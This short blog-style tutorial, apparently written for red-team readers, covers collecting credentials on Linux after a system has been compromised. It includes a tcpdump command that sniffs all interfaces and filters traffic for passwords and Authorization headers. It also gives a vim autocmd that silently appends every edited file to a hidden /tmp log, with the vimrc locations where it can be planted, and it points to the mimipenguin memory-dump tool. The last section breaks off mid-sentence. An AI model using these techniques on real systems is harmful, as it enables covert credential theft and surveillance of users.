Post-Penetration on Linux: Various Methods for Credential Collection (Part 1)

tcpdump

Use tcpdump to capture traffic from all network interfaces in real-time, filtering and saving when sensitive information is detected in the traffic.

tcpdump -i any -s 0 -A -n -l |egrep -i "Host:|Authorization:|password:|password="
  • • -i any: Listen to traffic on all network interfaces;
  • • -s 0: Capture full packets (no truncation);
  • • -A: Display packet contents in ASCII format (readable text);
  • • -n: Disable DNS resolution (directly display IP addresses for faster processing);
  • • -l: Enable line buffering mode (real-time output, suitable for pipeline processing);

Post-Penetration on Linux: Various Methods for Credential Collection (Part 1)

vim

Utilize vim configuration files to log keyboard input by writing the following command into the vim configuration file: <span>:autocmd BufWritePost * :silent :w! >> /tmp/.keylog.txt</span> This will automatically write the contents of any file edited in vim to /tmp/.keylog.txt.

~/.vim/plugins
.vimrc
/etc/vim/vimrc
/etc/.vimrc

Post-Penetration on Linux: Various Methods for Credential Collection (Part 1)

mimipenguin

A tool for dumping the current Linux desktop user’s login passwords, which relies on the GNOME desktop environment to extract passwords from memory dumps of <span>ssh",</span>

Leave a Comment